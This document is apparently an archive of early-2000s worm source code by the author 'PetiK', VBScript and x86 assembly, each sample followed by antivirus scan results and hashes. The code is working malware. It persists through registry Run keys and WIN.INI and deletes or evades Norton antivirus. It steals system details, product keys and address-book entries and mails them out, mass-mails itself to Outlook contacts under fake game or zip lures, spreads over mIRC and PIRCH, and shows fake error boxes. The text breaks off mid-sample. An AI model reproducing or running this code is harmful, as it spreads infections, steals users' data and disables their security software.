DEBUT() Sub DEBUT() Set win = fso.GetSpecialFolder(0) RS = ("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\NetWork") Set c = fso.GetFile(WScript.ScriptFullName) NetWork = (win&"\Network.vbs") c.Copy (NetWork) ws.RegWrite RS,NetWork 'NORTON() MIRC() ESPION() EMAIL() End Sub
Sub NORTON() ws.RegDelete ("HKLM\Software\Symantec\") ws.RegDelete ("HKCU\Software\Symantec\") End Sub
Sub ESPION() Set win = fso.GetSpecialFolder(0) Set A = CreateObject("Outlook.Application") Set B = A.GetNameSpace("MAPI") For Each C In B.AddressLists If C.AddressEntries.Count <> 0 Then For D = 1 To C.AddressEntries.Count Set E = C.Addressentries(D) Next End If Next ComputerName = CreateObject("WScript.NetWork").ComputerName NOM = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner") ENT = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization") VER = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version") NUM = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber") REC1 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductName") REC2 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey") REC3 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId") PPDB = ws.RegRead("HKCU\Control Panel\Desktop\Wallpaper") DDEV = ws.RegRead("HKCU\Control Panel\Desktop\ScreenSaveTimeOut") PDEM = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page") DDIR = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Download Directory") Set aze = fso.CreateTextFile ("C:\ESPION.txt",true) aze.WriteLine "Information sur l'ordinateur" aze.WriteLine "NOM DE L'ORDINATEUR : " & ComputerName aze.WriteLine "NOM D'UTILISATEUR : " & NOM aze.WriteLine "NOM DE L'ENTREPRISE : " & ENT aze.WriteLine "SYSTEME D'EXPLOITAION : " & VER & " " & NUM aze.WriteLine "NUMERO DE LICENSE : " & REC1 & " " & REC2 aze.WriteLine "NUMERO D'IDENTIFICATION : " & REC3 aze.WriteLine "PAPIER PEINT DE BUREAU : " & PPDB aze.WriteLine "L'ECRAN DE VEILLE DE DECLENCHE AU BOUT DE " & DDEV & " SECONDES" aze.WriteLine "NON DANS CARNET D'ADRESSES : " & E.Name aze.WriteLine "ADDRESSE : " & E.Address aze.WriteBlankLines(2) aze.WriteLine "Information sur internet" aze.WriteLine "LA PAGE DE DEMARRAGE EST : " & PDEM aze.WriteLine "LE DOSSIER DE TELECHARGEMENT EST : " & DDIR End Sub Sub MIRC() On Error Resume Next NET2 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\NetWork") script = ("C:\script.ini") Set srpt = fso.CreateTextFile(script, true) srpt.WriteLine "[script]; par PetiK " srpt.WriteLine "n0=on 1:JOIN:#:{" srpt.WriteLine "n1= /if ( $nick == $me ) { halt }" srpt.WriteLine "n2= /dcc send $nick " & NET2 srpt.WriteLine "n3=}" srpt.Close fso.CopyFile script, "C:\mirc\script.ini" fso.CopyFile script, "C:\mirc32\script.ini" fso.CopyFile script, "C:\program files\mirc\script.ini" fso.CopyFile script, "C:\program files\mirc32\script.ini" fso.DeleteFile ("C:\script.ini") End Sub
Sub EMAIL() Set OApp = CreateObject("Outlook.Application") if oapp="Outlook" then Set Mapi = OApp.GetNameSpace("MAPI") For Each AddList In Mapi.AddressLists If AddList.AddressEntries.Count <> 0 Then For AddListCount = 1 To AddList.AddressEntries.Count Set AddListEntry = AddList.AddressEntries(AddListCount) Set msg = OApp.CreateItem(0) msg.To = AddListEntry.Address msg.Subject = "NetWork Game for WINDOWS" msg.Body = "The new game for your computer arrives" msg.Attachments.Add fso.BuildPath(fso.GetSpecialFolder(0),"\Network.vbs") If msg.To <> "" Then msg.Send End If Next End If Next End if Set msg2 = OApp.CreateItem(0) msg2.BCC = "[email protected]; [email protected]" msg2.Subject = "Message écrit le " & date msg2.Body = "Il était " & time msg2.Attachments.Add ("C:\ESPION.txt") msg2.Send fso.DeleteFile ("C:\ESPION.txt") End Sub File Network.vbs received on 05.16.2009 17:59:59 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK AhnLab-V3 5.0.0.2 2009.05.16 VBS/Petik AntiVir 7.9.0.168 2009.05.15 Worm/Petik.K1 Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Petik Authentium 5.1.2.4 2009.05.16 VBS/Petik.L@mm Avast 4.8.1335.0 2009.05.15 VBS:MailWorm-gen AVG 8.5.0.336 2009.05.15 I-Worm/Petik BitDefender 7.2 2009.05.16 Generic.ScriptWorm.892F765D CAT-QuickHeal 10.00 2009.05.15 VBS/Petik.L ClamAV 0.94.1 2009.05.16 Worm.VBS-14 Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik DrWeb 5.0.0.12182 2009.05.16 modification of W97M.Necronom eSafe 7.0.17.0 2009.05.14 VBS.Scramble. eTrust-Vet 31.6.6508 2009.05.16 VBS/Buggy F-Prot 4.4.4.56 2009.05.16 VBS/Petik.L@mm F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik Fortinet 3.117.0.0 2009.05.16 VBS/PETIK.K1 GData 19 2009.05.16 Generic.ScriptWorm.892F765D Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik K7AntiVirus 7.10.737 2009.05.16 - Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik McAfee 5616 2009.05.15 VBS/Generic McAfee+Artemis 5616 2009.05.15 VBS/Generic McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.K1 Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.K NOD32 4080 2009.05.15 probably unknown SCRIPT Norman 6.01.05 2009.05.16 VBS/GenMail.D nProtect 2009.1.8.0 2009.05.16 VBS.Petik.C@mm Panda 10.0.0.14 2009.05.16 VBS/Generic.worm PCTools 4.4.2.0 2009.05.16 VBS.Petik.K Prevx 3.0 2009.05.16 - Rising 21.29.52.00 2009.05.16 Worm.Hopalong Sophos 4.41.0 2009.05.16 VBS/Petik-K Sunbelt 3.2.1858.2 2009.05.16 - Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.gen TheHacker 6.3.4.1.326 2009.05.15 - TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.K1 VBA32 3.12.10.5 2009.05.16 - ViRobot 2009.5.15.1737 2009.05.15 - Additional information File size: 4245 bytes MD5...: af1121c899b152b95520214e4873e466 SHA1..: 2201e0075c58deed1db798dcc1c0c9f50d7086db ' Name : VBS.Kadosh ' Author : PetiK ' Language : VBS ' Date : 06/01/2001
' VBS/Kadosh.A par PandaKiller ' Ce fichier se copie dans le répertoire WINDOWS sous le nom de ' WINEXEC.EXE.VBS et dans le répertoire SYSTEM sous winRun.dll.vbs ' Il change la page de démarrage du WEB et met LIVE.MULTIMANIA.COM ' ATTENTION : Norton détècte ce programme comme le virus VBS.NewLove.A ' CE N'EST PAS UN VIRUS : IL NE DETRUIT RIEN
DEBUT() Sub DEBUT() Set a = CreateObject("Scripting.FileSystemObject") Set win = a.GetSpecialFolder(0) Set sys = a.GetSpecialFolder(1) Set c = a.GetFile(WScript.ScriptFullName) c.Copy(win&"\WinExec.exe.vbs") c.Copy(sys&"\WinRun.dll.vbs") INTERNET() EMAIL() msgbox "Le tour du monde en 20 jours",vbinformation End Sub
' MODIFIE LA PAGE DE DEMARRAGE D'INTERNET
Sub INTERNET() Set W = Wscript.CreateObject("WScript.Shell") W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "live.multimania.com" W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinExec", "C:\WINDOWS\WinExec.exe.vbs" End Sub
' ENVOIE UNE DE SES COPIE A TOUS LES DESTINATAIRE DU CARNET D'ADRESSE Sub EMAIL() Set K = CreateObject("Outlook.Application") Set L = K.GetNameSpace("MAPI") For Each M In L.AddressLists If M.AddressEntries.Count <> 0 Then Set N = K.CreateItem(0) For O = 1 To M.AddressEntries.Count Set P = M.AddressEntries(O) If O = 1 Then N.BCC = P.Address Else N.BCC = N.BCC & "; " & P.Address End If Next N.Subject = "Le Tour du Monde" N.Body = "Voici une lettre qui va faire le tour du monde. Ouvre Vite" Set Q = CreateObject("Scripting.FileSystemObject") N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"WinExec.exe.vbs") N.Send End If Next End Sub File WinExec.exe.vbs received on 05.11.2009 07:14:12 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.11 Email-Worm.Win32.Petik!IK AhnLab-V3 5.0.0.2 2009.05.11 - AntiVir 7.9.0.166 2009.05.10 Worm/Petik.05 Antiy-AVL 2.0.3.1 2009.05.08 Worm/Win32.Win32 Authentium 5.1.2.4 2009.05.10 VBS/Petik.W@mm Avast 4.8.1335.0 2009.05.10 VBS:MailWorm-gen AVG 8.5.0.327 2009.05.10 I-Worm/Petik BitDefender 7.2 2009.05.11 Generic.ScriptWorm.EDFACDDC CAT-QuickHeal 10.00 2009.05.09 VBS/Petik.W ClamAV 0.94.1 2009.05.11 - Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik DrWeb 5.0.0.12182 2009.05.11 WORM.Virus eSafe 7.0.17.0 2009.05.10 - eTrust-Vet 31.6.6497 2009.05.08 VBS/Sodak F-Prot 4.4.4.56 2009.05.10 VBS/Petik.W@mm F-Secure 8.0.14470.0 2009.05.11 Email-Worm.Win32.Petik Fortinet 3.117.0.0 2009.05.10 VBS/Petik.M@mm GData 19 2009.05.11 Generic.ScriptWorm.EDFACDDC Ikarus T3.1.1.49.0 2009.05.11 Email-Worm.Win32.Petik K7AntiVirus 7.10.729 2009.05.08 VBS.Generic.MassMailer Kaspersky 7.0.0.125 2009.05.11 Email-Worm.Win32.Petik McAfee 5611 2009.05.10 VBS/Generic@MM McAfee+Artemis 5611 2009.05.10 VBS/Generic@MM McAfee-GW-Edition 6.7.6 2009.05.11 Worm.Petik.05 Microsoft 1.4602 2009.05.10 Virus:VBS/Petik.L NOD32 4063 2009.05.08 probably unknown SCRIPT Norman 6.01.05 2009.05.08 VBS/Autorun.AP nProtect 2009.1.8.0 2009.05.10 VBS.Petik.D@mm Panda 10.0.0.14 2009.05.10 - PCTools 4.4.2.0 2009.05.07 VBS.Petik.L Prevx 3.0 2009.05.11 - Rising 21.29.00.00 2009.05.11 Worm.Hopalong Sophos 4.41.0 2009.05.11 VBS/Petik-L Sunbelt 3.2.1858.2 2009.05.09 - Symantec 1.4.4.12 2009.05.11 VBS.LoveLetter.Var TheHacker 6.3.4.1.324 2009.05.09 - TrendMicro 8.950.0.1092 2009.05.11 VBS_GENERIC.001 VBA32 3.12.10.4 2009.05.11 Email-Worm.Win32.Petik ViRobot 2009.5.11.1728 2009.05.11 VBS.Worm-Family VirusBuster 4.6.5.0 2009.05.10 VBS.Petik.L Additional information File size: 1683 bytes MD5...: 763d1411edc603a60b7fdd2f63d77579 SHA1..: 98fede0c3a54c7c3fd8261b44b27107f91f4fc49 ' Name : VBS.ShowVar ' Author : PetiK ' Language : VBS ' Date : 17/01/2001
' Copy itself to %WINDIR%\Showvar.vbs ' Add to registry HKLM\Software\Microsoft\Windows\CurrentVersion\Run ' Showvar = %WINDIR%\Showvar.vbs ' Spread with MIRC by writing a script. ' Spread via PIRCH. ' Spread via mail : ' Subject : "Salut l'ami. Ouvre vite, la chance peut tourner !!" ' No file attached, the code of worm is directly int the HTML code of the mail. It creats a VBS file into the WINDIR directory and run it. ' When day is 5th we can see a messagebox
'ShowVar par PetiK 21/01/2000 Dim fso,ws,file Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") Set file = fso.OpenTextFile(WScript.ScriptFullName,1) vbscopie = file.ReadAll
DEBUT() Sub DEBUT() On Error Resume Next Set win = fso.GetspecialFolder(0) RUN = ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar") Set c = fso.GetFile(WScript.ScriptFullName) ShowVar = (win&"\Showvar.vbs") c.Copy (ShowVar) ws.RegWrite RUN,ShowVar If ws.RegRead ("HKCU\Software\ShowVar\MIRC") <> "1" then Mirc "" End If If ws.RegRead ("HKCU\Software\ShowVar\PIRCH") <> "1" then Pirch "" End If if ws.regread ("HKCU\Software\ShowVar\MAIL") <> "1" then EMail() End If Divers() End Sub
Function Mirc(Path) 'On Error Resume Next If Path = "" Then If fso.fileexists("c:\mirc\mirc.ini") Then Path = "c:\mirc" If fso.fileexists("c:\mirc32\mirc.ini") Then Path = "c:\mirc32" PFD = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") SV2 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar") If fso.fileexists(PFD & "\mirc\mirc.ini") Then Path = PFD & "\mirc" End If If Path <> "" Then Set Script = fso.CreateTextFile(Path & "\script.ini", True) Script.writeline "[script]" Script.writeline "n0=on 1:JOIN:#:{" Script.writeline "n1= /if ( $nick == $me ) { halt }" Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick " & SV2 Script.writeline "n3=}" Script.Close ws.RegWrite "HKCU\Software\ShowVar\MIRC", "1" End If End Function
Function Pirch(path) On Error Resume Next Set fso = CreateObject("scripting.filesystemobject") Set ws = CreateObject("wscript.shell") If path = "" Then If fso.fileexists("c:\pirch\Pirch32.exe") Then path = "c:\pirch" If fso.fileexists("c:\pirch32\Pirch32.exe") Then path = "c:\pirch32" pfDir = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") SV3 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar") If fso.fileexists(pfDir & "\pirch\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe" End If If path <> "" Then Set Script = fso.CreateTextFile(path & "\events.ini", True) Script.WriteLine "[Levels]" Script.WriteLine "Enabled=1" Script.WriteLine "Count=6" Script.WriteLine "Level1=000-Unknowns" Script.WriteLine "000-UnknownsEnabled=1" Script.WriteLine "Level2=100-Level 100" Script.WriteLine "100-Level 100Enabled=1" Script.WriteLine "Level3=200-Level 200" Script.WriteLine "200-Level 200Enabled=1" Script.WriteLine "Level4=300-Level 300" Script.WriteLine " 300-Level 300Enabled=1" Script.WriteLine "Level5=400-Level 400 " Script.WriteLine "400-Level 400Enabled=1" Script.WriteLine "Level6=500-Level 500" Script.WriteLine "500-Level 500Enabled=1" Script.WriteLine "" Script.WriteLine "[000-Unknowns]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[100-Level 100]" Script.WriteLine "User1=*!*@*" Script.WriteLine "UserCount=1" Script.WriteLine "Event1=ON JOIN:#:/" & chr(100) & chr(99) & chr(99) & " tsend $nick " & SV3 Script.WriteLine "EventCount=1" Script.WriteLine "" Script.WriteLine "[200-Level 200]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[300-Level 300]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[400-Level 400]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[500-Level 500]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.Close End If ws.RegWrite "HKCU\Software\ShowVar\PIRCH", "1" End Function
Function EMail() On Error Resume Next Set fso = CreateObject("scripting.filesystemobject") Set Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then Set Myself = fso.opentextfile(wscript.scriptfullname, 1) I = 1 Do While Myself.atendofstream = False MyLine = Myself.readline Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34) & "&chr(34)&" & Chr(34)) Loop Myself.Close htm = "
File Bother.htm received on 05.16.2009 11:20:32 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 Virus.VBS.Both!IK AhnLab-V3 5.0.0.2 2009.05.15 HTML/Bother AntiVir 7.9.0.168 2009.05.15 VBS/Both Antiy-AVL 2.0.3.1 2009.05.15 Virus/VBS.VBS Authentium 5.1.2.4 2009.05.15 VBS/Both.A Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen AVG 8.5.0.336 2009.05.15 VBS/Bother.A BitDefender 7.2 2009.05.16 VBS.Both.A CAT-QuickHeal 10.00 2009.05.15 VBS/Both.A ClamAV 0.94.1 2009.05.15 VBS.Startpage-1 Comodo 1157 2009.05.08 - DrWeb 5.0.0.12182 2009.05.16 VBS.Bother eSafe 7.0.17.0 2009.05.14 Virus.VBS.Both eTrust-Vet 31.6.6508 2009.05.16 VBS/Both F-Prot 4.4.4.56 2009.05.15 VBS/Both.A F-Secure 8.0.14470.0 2009.05.15 Virus.VBS.Both Fortinet 3.117.0.0 2009.05.16 VBS/Both.A GData 19 2009.05.16 VBS.Both.A Ikarus T3.1.1.49.0 2009.05.16 Virus.VBS.Both K7AntiVirus 7.10.735 2009.05.14 - Kaspersky 7.0.0.125 2009.05.16 Virus.VBS.Both McAfee 5616 2009.05.15 VBS/Bother McAfee+Artemis 5616 2009.05.15 VBS/Bother McAfee-GW-Edition 6.7.6 2009.05.15 Script.Both Microsoft 1.4602 2009.05.16 Virus:VBS/SYSID NOD32 4080 2009.05.15 VBS/Bother Norman 6.01.05 2009.05.16 VBS/Both.K nProtect 2009.1.8.0 2009.05.16 VBS.Both.A Panda 10.0.0.14 2009.05.15 Univ.A PCTools 4.4.2.0 2009.05.15 VBS.Bother.A Prevx 3.0 2009.05.16 - Rising 21.29.52.00 2009.05.16 Script.HTML.Both Sophos 4.41.0 2009.05.16 VBS/Bother Sunbelt 3.2.1858.2 2009.05.16 Virus.VBS.Both (v) Symantec 1.4.4.12 2009.05.16 VBS.Bother.3180 TheHacker 6.3.4.1.326 2009.05.15 - TrendMicro 8.950.0.1092 2009.05.15 HTML_BOTHER.A VBA32 3.12.10.5 2009.05.16 Virus.VBS.Both ViRobot 2009.5.15.1737 2009.05.15 VBS.Both VirusBuster 4.6.5.0 2009.05.15 VBS.Bother.A Additional information File size: 3255 bytes MD5...: 915aaf9b61f0d62c1fc2082198b324be SHA1..: e2bf913ffca85e796ecef0564a896625dc748332 comment # Name : I-Worm.Friends Author : PetiK Date : May 13th - May 15th 2001 Action : This worm use a VBS script and Micosoft Outlook to spread. It copies itself to \%SYSTEM%\Iesetup.exe. WIN.INI is modified with run=\%SYSTEM%\Iesetup.exe. It creates a script file for mIRC in C:\mirc ans C:\mirc32. It shows the first time a fake Winzip message box. The worm creates C:\Friends and creates the file maya.vbs to spread. It changes the values : HKLM\Software\Microsoft\Windows\CurrentVersion RegisteredOwner : Maya, Laurent, Etienne RegisteredOrganization : PetiK Corporation On 5th of every month, it shows a message box.#
.386 jumps locals .model flat,stdcall
;KERNEL32.dll extrn WritePrivateProfileStringA:PROC extrn lstrcat:PROC extrn GetModuleFileNameA:PROC extrn CopyFileA:PROC extrn CreateDirectoryA:PROC extrn CreateFileA:PROC extrn ExitProcess:PROC extrn CloseHandle:PROC extrn GetModuleHandleA:PROC extrn GetSystemDirectoryA:PROC extrn GetSystemTime:PROC extrn GetWindowsDirectoryA:PROC extrn WinExec:PROC extrn WriteFile:PROC
;USER32.dll extrn MessageBoxA:PROC
;ADVAPI32.dll extrn RegOpenKeyExA:PROC extrn RegSetValueExA:PROC extrn RegCloseKey:PROC
.data szOrig db 50 dup (0) szPTK db 50 dup (0) szWin db 50 dup (0) FileHandle dd ? RegHandle dd ? octets dd ? winini db "\\WIN.INI",00h run db "run",00h windows db "windows",00h Copie db "\Iesetup.exe",00h inifile db "\petik",00h script1 db "C:\mirc\script.ini",00h script2 db "C:\mirc32\script.ini",00h VBS db "C:\Friends\maya.vbs",00h DIR db "C:\Friends",00h OWN_D db "RegisteredOwner",00h OWN_S db "Maya, Laurent, Etienne",00h ORG_D db "RegisteredOrganization",00h ORG_S db "PetiK Corporation",00h SOUS_CLE db "Software\Microsoft\Windows\CurrentVersion",00h TITRE db "WinZip Self-Extractor",00h TEXTE db "WinZip Self-Extractor header corrupt. Possible cause: bad disk or file transfer error",00h TITRE2 db "I-Worm.Friends",00h TEXTE2 db "Coded by PetiK (c)2001",0dh,0ah db "",0dh,0ah db "To my friends Maya and Laurent",00h email db "wscript C:\Friends\maya.vbs",00h FILE_ATTRIBUTE_READONLY equ 00000001h CREATE_NEW equ 00000001h CREATE_ALWAYS equ 00000002h FILE_SHARE_READ equ 00000001h GENERIC_WRITE equ 40000000h HKEY_LOCAL_MACHINE equ 80000002h KEY_SET_VALUE equ 00000002h REG_SZ equ 00000001h
SYSTIME struct wYear WORD ? wMonth WORD ? wDayOfWeek WORD ? wDay WORD ? wHour WORD ? wMinute WORD ? wsecond WORD ? wMilliseconds WORD ? SYSTIME ends SystemTime SYSTIME <> petikd: db "[script]",0dh,0ah db "n0=on 1:JOIN:#:{",0dh,0ah db "n1= /if ( $nick == $me ) { halt }",0dh,0ah db "n2= /.dcc send $nick " szCopie db 50 dup (0) db "",0dh,0ah db "n3=}",00h PETIKTAILLE equ $-petikd mayad: db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'fso.Copyfile fso.GetSpecialFolder(1)&"\Iesetup.exe", fso.GetSpecialFolder(1)&"\NetFriends.exe"',0dh,0ah db 'Set K = CreateObject("Outlook.Application")',0dh,0ah db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah db 'For Each M In L.AddressLists',0dh,0ah db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah db 'For O = 1 To M.AddressEntries.Count',0dh,0ah db 'Set P = M.AddressEntries(O)',0dh,0ah db 'Next',0dh,0ah db 'Set N = K.CreateItem(0)',0dh,0ah db 'N.Subject = "Would you like a Net Friend ?"',0dh,0ah db 'N.Body = "Look at this zip file to find a Net Friend"',0dh,0ah db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(1),"NetFriends.exe")',0dh,0ah db 'If N.To <> "" Then',0dh,0ah db 'N.Send',0dh,0ah db 'End If',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah MAYATAILLE equ $-mayad .code DEBUT: PREPAR: push 50 push offset szCopie call GetSystemDirectoryA push offset Copie push offset szCopie call lstrcat FILE: push 50 ; Create PetiK in \%WINDIR%, a mIRC script push offset szPTK call GetWindowsDirectoryA push offset inifile push offset szPTK call lstrcat push 00h push FILE_ATTRIBUTE_READONLY push CREATE_NEW push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset szPTK ; success ? continue call CreateFileA cmp eax,-1 je BDR ; or else, jump to label BDR mov [FileHandle],eax push 00h push offset octets push PETIKTAILLE push offset petikd push [FileHandle] call WriteFile push [FileHandle] call CloseHandle ; the file is create
MIRC: push 00h push offset script1 push offset szPTK call CopyFileA ; copy the file to C:\mirc push 00h push offset script2 push offset szPTK call CopyFileA ; and C:\mirc32
EMAIL: push 00h push offset DIR call CreateDirectoryA ; Create the directory C:\Friends push 00h push FILE_ATTRIBUTE_READONLY push CREATE_ALWAYS push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset VBS call CreateFileA ; and put the VBS file maya.vbs mov [FileHandle],eax push 00h push offset octets push MAYATAILLE push offset mayad push [FileHandle] call WriteFile push [FileHandle] call CloseHandle
ENVOIE: push 01h push offset email call WinExec ; run this file
COPIE: push 00h call GetModuleHandleA push 50 push offset szOrig push eax call GetModuleFileNameA push 00h push offset szCopie push offset szOrig call CopyFileA ; Copy our file ti \%SYSTEM%\Iesetup.exe WIN_INI:push 50h push offset szWin call GetWindowsDirectoryA push offset winini push offset szWin call lstrcat push offset szWin ; Write to WIN.INI file in run section push offset szCopie ; [windows] push offset run ; run=\%SYSTEM%\Iesetup.exe push offset windows call WritePrivateProfileStringA MESS: push 10h ; Show the fake error message push offset TITRE push offset TEXTE push 00h call MessageBoxA BDR: push offset RegHandle push KEY_SET_VALUE push 00h push offset SOUS_CLE push HKEY_LOCAL_MACHINE call RegOpenKeyExA
push 02h push offset OWN_D push offset REG_SZ push 00h push offset OWN_S push [RegHandle] call RegSetValueExA ; Change the name of Registered Owner push 02h push offset ORG_D push offset REG_SZ push 00h push offset ORG_S push [RegHandle] call RegSetValueExA ; Change the name of Registered Organization
push [RegHandle] call RegCloseKey
DATE: push offset SystemTime call GetSystemTime cmp [SystemTime.wDay],05h ; 5th of the month ? jne FIN push 40h push offset TITRE2 push offset TEXTE2 push 00h call MessageBoxA ; Show a messagebox FIN: push 00h call ExitProcess end DEBUT File Friends.exe received on 05.16.2009 11:58:15 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK AhnLab-V3 5.0.0.2 2009.05.15 Win32/PetTick.6656 AntiVir 7.9.0.168 2009.05.15 Worm/Petik.15 Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32 Authentium 5.1.2.4 2009.05.15 W32/Malware!543d Avast 4.8.1335.0 2009.05.15 Win32:PetiK-Friends AVG 8.5.0.336 2009.05.15 I-Worm/Petik.B BitDefender 7.2 2009.05.16 Generic.Malware.IM.34A9CFBA CAT-QuickHeal 10.00 2009.05.15 W32.Petik.B ClamAV 0.94.1 2009.05.15 W32.PetTick Comodo 1157 2009.05.08 - DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.6656 eSafe 7.0.17.0 2009.05.14 - eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.6656.A F-Prot 4.4.4.56 2009.05.15 W32/Malware!543d F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik Fortinet 3.117.0.0 2009.05.16 W32/PetTick.B@mm GData 19 2009.05.16 Generic.Malware.IM.34A9CFBA Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik McAfee 5616 2009.05.15 W32/PetTick@MM McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.15 Microsoft 1.4602 2009.05.16 Worm:Win32/Petik.B NOD32 4080 2009.05.15 Win32/Petik.B Norman 6.01.05 2009.05.16 W32/Pet_Tick.6656.B nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.6656.C Panda 10.0.0.14 2009.05.16 W32/Petik.B PCTools 4.4.2.0 2009.05.15 VBS.LoveLetter Prevx 3.0 2009.05.16 - Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.v Sophos 4.41.0 2009.05.16 W32/Petik-B Sunbelt 3.2.1858.2 2009.05.16 Friends worm Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.B VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192 ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.6656.A VirusBuster 4.6.5.0 2009.05.15 VBS.LoveLetter Additional information File size: 6656 bytes MD5...: 18651c3df28058b96d1297d1568d4fd8 SHA1..: b6689d3f64f47909b219b4a17fcae7c3f6567fd8 comment # Name : I-Worm.Mustard Author : PetiK Date : May 10th - 27th Size : 7168 bytes Action : When the worm is first executed, it will create the key HKCU\Software\[PetiK]. After, it will copy itself as Windows\AVUpdate.exe. It alters the run= in the Win.ini file to : run=Windows\AVUpdate.exe. It will try to delete the value "Norton Auto-Protect" in the Run key of registry. If it succeed, he alter "Exclude.dat" so that the VBS file don't analyze by Norton Antivirus. It shows a message box and reboot the computer. Next start, it will creates a VBS worm with the attributes "readonly" and "hidden". On June 17th, it shows a message box.
#
.386 jumps locals .model flat,stdcall extrn CloseHandle:PROC extrn CopyFileA:PROC extrn CreateFileA:PROC extrn DeleteFileA:PROC extrn ExitProcess:PROC extrn ExitWindowsEx:PROC extrn GetFileAttributesA:PROC extrn GetModuleFileNameA:PROC extrn GetModuleHandleA:PROC extrn GetSystemTime:PROC extrn GetWindowsDirectoryA:PROC extrn lstrcat:PROC extrn MessageBoxA:PROC extrn RegCreateKeyExA:PROC extrn RegOpenKeyExA:PROC extrn RegDeleteValueA:PROC extrn RegQueryValueExA:PROC extrn RegCloseKey:PROC extrn SetFileAttributesA:PROC extrn SetFilePointer:PROC extrn Sleep:PROC extrn WinExec:PROC extrn WriteFile:PROC extrn WritePrivateProfileStringA:PROC
.data FileHandle dd ? RegHandle dd ? octets dd ? regDisp dd 0 regResu dd 0 Dist dd 0 szNOR db 50 dup (0) szOrig db 50 dup (0) szWin db 50 dup (0) Buffer db 7Fh dup (0) BufferSize dd 7Fh run db "run",00h windows db "windows",00h Winini db "\\WIN.INI",00h Copie db "\AVUpdate.exe",00h filedat db "\Exclude.dat",00h email db "wscript C:\send.vbs",00h VBS db "C:\send.vbs",00h mirc db "C:\Win.sys",00h script1 db "C:\mirc\script.ini",00h script2 db "C:\mirc32\script.ini",00h script3 db "C:\Program Files\mirc\script.ini",00h script4 db "C:\Program Files\mirc32\script.ini",00h CLE db "Software\[PetiK]",00h TITRE db "Install Information",00h TEXTE db "Please reboot your computer to finish the installation",00h CLE_RUN db "Software\Microsoft\Windows\CurrentVersion\Run",00h NAV db "Norton Auto-Protect",00h CLE_NOR db "\Software\Symantec\InstalledApps",00h ValueType dd 00h Value db "NAV",00h CREE db 